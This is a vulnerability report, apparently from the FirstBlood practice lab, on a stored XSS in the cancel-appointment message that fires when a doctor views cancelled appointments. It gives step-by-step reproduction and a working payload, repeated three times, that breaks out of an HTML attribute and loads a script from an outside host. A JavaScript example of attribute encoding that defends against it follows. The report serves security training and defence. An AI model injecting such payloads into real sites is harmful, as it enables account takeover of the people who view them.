FirstBlood-#862 Stored XSS on cancelled appointment message
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-29, 0xirfan Level 5 reported:

Summary

The message parameter when cancelling an Appointment is vulnerable to XSS

Finding the Payload

1) Understanding the scope where data is reflected: it was reflected in the anchor tag's data-original-title value. So I had to get out of the anchor tag.
2) Filtering was in place for the parameter, so I used the trick of a script tag without closing it:

"><script+src="https://muhammed1rfan.github.io/simple.js?q=

Steps

1) Create an appointment by visiting book-appointment.php.
2) Fill in the details and click Book Appointment.
3) You will get an Appointment ID as the response. Note it down.
4) Now visit /yourappointments.php, provide the Appointment ID and click Retrieve Appointment.
5) Now add "><script+src="https://muhammed1rfan.github.io/simple.js?q= as the comment and then click Cancel Appointment.
6) When the doctor visits /drpanel/cancelled.php the XSS will be triggered.

Impact

The XSS can be used for ATO

P2 High

Endpoint: /api/ma.php

Parameter: message

Payload: "><script+src="https://muhammed1rfan.github.io/simple.js?q=


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, the fix actually introduced new instances of the issue, for example when creating and editing an appointment and not only when cancelling it. Making use of htmlentities() and relying on .value() in JavaScript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also leaves admins vulnerable on cancelled appointments as well.
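The sink in this report is an HTML attribute (data-original-title), so the defence is contextual output encoding at the point where the message is written into the markup, not a filter on the input. The following is an added illustration, not FirstBlood's own code: it renders a cancelled-appointment entry with the message encoded for the attribute context, and checks that the quoted payload shape stays inert while the tooltip text survives intact. The markup shape, the field names and the sample message are assumptions constructed for the example.

```javascript
// Added example (not FirstBlood code): contextual output encoding for the
// data-original-title attribute sink described in the report. FirstBlood builds
// this markup server-side in PHP; the same rendering is modelled here in JavaScript.
const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode a string for placement inside a double- or single-quoted HTML attribute.
// All five characters are encoded so the value can never close the attribute or
// the tag, regardless of which quote style the template uses.
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ESCAPES[ch]);
}

// Render one cancelled-appointment entry with the message in data-original-title.
// The "id" field and the anchor markup are assumptions for illustration.
function renderCancelledAppointment({ id, message }) {
  return `<a href="#" data-toggle="tooltip" data-original-title="${escapeAttr(message)}">` +
         `Appointment ${escapeAttr(id)}</a>`;
}

// Decode the entities escapeAttr emits, to show what the browser presents as the
// tooltip text once the attribute is parsed.
function decodeAttr(value) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#x27': "'" };
  return value.replace(/&(amp|lt|gt|quot|#x27);/g, (m, name) => map[name]);
}

// Pull a double-quoted attribute value out of a rendered string (test helper).
function attrValue(html, name) {
  const m = html.match(new RegExp(`${name}="([^"]*)"`));
  return m ? m[1] : null;
}

// Constructed sample message with the same shape as the report's payload: a quote
// to break out of the attribute, then an unclosed script tag. The "+" in the report
// is just a URL-encoded space; a placeholder host is used here.
const SAMPLE_MESSAGE = '"><script src="https://example.invalid/simple.js?q=';

// Returns true when the rendered entry opens no element other than the anchor.
function rendersSafely(message) {
  const html = renderCancelledAppointment({ id: 22, message });
  return !html.includes('<script') && html.split('<a ').length === 2;
}
```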